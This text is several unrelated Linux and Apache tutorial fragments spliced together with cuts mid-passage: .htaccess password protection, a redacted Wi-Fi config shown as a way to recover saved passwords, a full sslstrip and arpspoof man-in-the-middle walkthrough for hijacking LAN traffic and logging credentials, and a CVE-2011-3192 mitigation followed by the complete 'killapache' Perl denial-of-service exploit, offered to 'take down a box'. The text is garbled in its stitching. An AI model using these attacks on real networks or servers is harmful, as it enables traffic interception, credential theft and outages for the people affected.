user3:$apr1$ROvNIWjo$96bOcy.gSiVuMlD9jphYO.

To creat the file run this command:
sudo htpasswd -c .htpasswd <username>
It will ask you for a password.

To add users to an existing .htpasswd file:
sudo htpasswd .htpasswd <username>
Again, it will ask you for a password

I usually create a directory outside my document root (where my web sites are stored) called user-access
So, in my case the document root is located at /data/www
I will create the directory user-access in /data

Run this command:
sudo mkdir /data/user-access

Ok.  Remember above when we created the .htpasswd file?  Move it to the new directory you just created /data/user-access
If I had created the file in my home directory it would be something like this:
sudo mv /home/user/.htpasswd /data/user-access

Now we are going to create the .htaccess file.  I want to restrict users from accessing a download directory on my server.

The directory in question is:
/data/www/downloads

I'm going to change to this directory and create the .htaccess file:
cd /data/www/downloads

Create the .htaccess file:
sudo vi .htaccess

Here is an example of what mine looks like:

AuthUserFile /data/user-access/.htpasswd
AuthName "Restricted Access - Valid User Credentials Required"
AuthType Basic

Require valid-user
Order allow,deny
Satisfy any

The line AuthUserFile /data/user-access/.htpasswd this is telling the .htaccess file where to look for the .htpasswd file we created
earlier.  It won't work if you don't set this file path correctly.

The line AuthName "Restricted Access - Valid User Credentials Required" anything wrapped in quotes can be changed to whatever you decide.

The line Requre valid-user is simply just saying it will accept any user you created with the .htpasswd file.  If you want to restrict it to just a single user, you can change that line to Require user <username>  (without brackets)

Restart Apache (this command will differ from the particular Linux distribution you have installed):
sudo /etc/init.d/apache2 restart

You can use this .htaccess file to pretty much control access to any web directory now.  No need to modify anything in it, just move it to whatever directory you want to control access to.

XXXXXXXX_XXXXXX"
key_mgmt=NONE
priority=5
}

network={
ssid="XXXXXXXX"
key_mgmt=NONE
priority=6
}

network={
ssid="XXXXX"
key_mgmt=NONE
priority=7
}

network={
ssid="XXXXXXXXXX"
key_mgmt=NONE
priority=8
}

network={
ssid="XX XXXXXX"
key_mgmt=NONE
priority=9
}

network={
ssid="XXX.XXXXX"
key_mgmt=NONE
priority=10
}

network={
ssid="XXXXXXX XXXXXX XXX"
psk="XXXXXXXXXXXX"
priority=11
}


So if you forget your saved passwords, you can use this little trick here.  This also works if you want to modify the passwords also.

Have Fun!

HTTP request sent, awaiting response... 200 OK
Length: 22198 (22K) [application/x-gzip]
Saving to: `sslstrip-0.9.tar.gz'

100%[====================================================================================>]
22,198      --.-K/s   in 0.07s

2011-12-05 01:35:11 (306 KB/s) - `sslstrip-0.9.tar.gz' saved [22198/22198]
#END TERMINAL OUTPUT

Extract the package "sslstrip-0.9.tar.gz" with the following command:
tar -zxvf sslstrip-0.9.tar.gz

#BEGIN TERMINAL OUTPUT
root@bt:~# tar -zxvf sslstrip-0.9.tar.gz
sslstrip-0.9/
sslstrip-0.9/README
sslstrip-0.9/COPYING
sslstrip-0.9/setup.py
sslstrip-0.9/sslstrip/
sslstrip-0.9/sslstrip/StrippingProxy.py
sslstrip-0.9/sslstrip/SSLServerConnection.py
sslstrip-0.9/sslstrip/ServerConnectionFactory.py
sslstrip-0.9/sslstrip/ClientRequest.py
sslstrip-0.9/sslstrip/ServerConnection.py
sslstrip-0.9/sslstrip/CookieCleaner.py
sslstrip-0.9/sslstrip/__init__.py
sslstrip-0.9/sslstrip/DnsCache.py
sslstrip-0.9/sslstrip/URLMonitor.py
sslstrip-0.9/lock.ico
sslstrip-0.9/sslstrip.py
#END TERMINAL OUTPUT

You also need to make sure you have python 2.5 or greater and the python "twisted web" module installed.
Install them like this:
apt-get install python python-twisted-web


In my case they were already installed:

#BEGIN TERMINAL OUTPUT
root@bt:~# apt-get install python python-twisted-web
Reading package lists... Done
Building dependency tree
Reading state information... Done
python is already the newest version.
python-twisted-web is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 38 not upgraded.
#END TERMINAL OUTPUT


Now change to the "sslstrip-0.9" directory:
cd sslstrip-0.9

#BEGIN TERMINAL OUTPUT
root@bt:~# cd sslstrip-0.9
root@bt:~/sslstrip-0.9# ls
COPYING  lock.ico  README  setup.py  sslstrip  sslstrip.py
#END TERMINAL OUTPUT

Run the command:
python ./setup.py install

#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# python ./setup.py install
running install
running build
running build_py
creating build
creating build/lib.linux-x86_64-2.6
creating build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/CookieCleaner.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ServerConnectionFactory.py ->
build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/StrippingProxy.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ClientRequest.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/__init__.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/DnsCache.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/SSLServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/URLMonitor.py -> build/lib.linux-x86_64-2.6/sslstrip
running build_scripts
creating build/scripts-2.6
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
changing mode of build/scripts-2.6/sslstrip from 644 to 755
running install_lib
creating /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/CookieCleaner.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnectionFactory.py
-> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnection.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/StrippingProxy.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ClientRequest.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/__init__.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/DnsCache.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/SSLServerConnection.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/URLMonitor.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/CookieCleaner.py
to CookieCleaner.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnectionFactory.py
to ServerConnectionFactory.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py
to ServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/StrippingProxy.py
to StrippingProxy.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ClientRequest.py
to ClientRequest.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/__init__.py
to __init__.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/DnsCache.py
to DnsCache.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/SSLServerConnection.py
to SSLServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/URLMonitor.py
to URLMonitor.pyc
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
creating /usr/local/share/sslstrip
copying README -> /usr/local/share/sslstrip
copying COPYING -> /usr/local/share/sslstrip
copying lock.ico -> /usr/local/share/sslstrip
running install_egg_info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up...
#END TERMINAL OUTPUT


Now we need to turn on IP forwarding, run this command:
echo "1" > /proc/sys/net/ipv4/ip_forward


Ok, iptables has got to be setup to redirect HTTP traffic to sslstrip:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

Change the <listenPort> above to an ephemeral port.  Something like 30000 should do.
So it should look like this:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 30000

Now we are going to execute sslstrip, run this command:
sslstrip -a -l 30000 -w secret.log

The listening port will be whatever you chose for iptables to redirect HTTP traffic too.

#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# sslstrip -a -l 30000 -w secret.log

sslstrip 0.9 by Moxie Marlinspike running...
#END TERMINAL OUTPUT

Notice above in the terminal output. Don't kill the terminal session. sslstrip is running!

Open a new terminal window.

Now we need to setup arpspoof so the network will think you are the gateway or router.  This way all traffic is sent to your machine first, then forwarded to the proper gateway on your network.
arpspoof -i <interface> -t <targetIP> <gatewayIP>

If you don't know your interface setting, just run a quick "ifconfig"
command and it will list it. The <gatewayIP> is the networks real
gateway/router, this is the traffic we want to hijack.
If you want arpspoof to intercept traffic across the whole LAN run:
arpspoof -i <interface> <gatewayIP>

So, I would run the command like this:
arpspoof -i eth0 -t 10.10.1.20 10.10.1.254

#BEGIN TERMINAL OUTPUT
root@bt:~# arpspoof -i eth0 10.10.1.254
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
#END TERMINAL OUTPUT

Notice above in the terminal output, you will constantly receive arp
replies, just let it run.  Don't kill the terminal session.

If you need additional help just run:
sslstrip --help

#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# sslstrip --help

sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and
from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.
#END TERMINAL OUTPUT


That's it...have fun!

httpd/modules/mod_headers.so
/usr/lib/httpd/modules/mod_headers.so
#END TERMINAL OUTPUT

Now, we need to add a few lines to the httpd.conf file.  Mine is located at:
vi /etc/httpd/conf/httpd.conf

Look for this line:
LoadModule headers_module modules/mod_headers.so

Insert this code under "LoadModule headers_module modules/mod_headers.so":
<IfModule mod_headers.c>
# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (?:,.*?){5,5} bad-range=1
RequestHeader unset Range env=bad-range
# We always drop Request-Range; as this is a legacy
# dating back to MSIE3 and Netscape 2 and 3.
RequestHeader unset Request-Range
# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range
CustomLog logs/range-CVE-2011-3192.log common env=bad-req-range
</IfModule>


The code we added above will drop the Range header request and it's set to log this data.

Just restart Apache for the settings to take effect:
/etc/init.d/httpd restart

Here is the exploit code if you want to play around with it, just save it to a .pl file:

#BEGIN EXPLOIT CODE
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl <host> [numforks]\n";
print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";

$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
$p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;

$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost:
$ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection:
close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
$pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost:
$ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection:
close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
print "host seems vuln\n";
return 1;
} else {
return 0;
}
}

if ($#ARGV < 0) {
usage;
exit;
}

if ($#ARGV > 1) {
$numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
print "Host does not seem vulnerable\n";
exit;
}
while(1) {
killapache();
}
#END EXPLOIT CODE

This will take down a box within a matter of minutes, if not, seconds.
Have fun!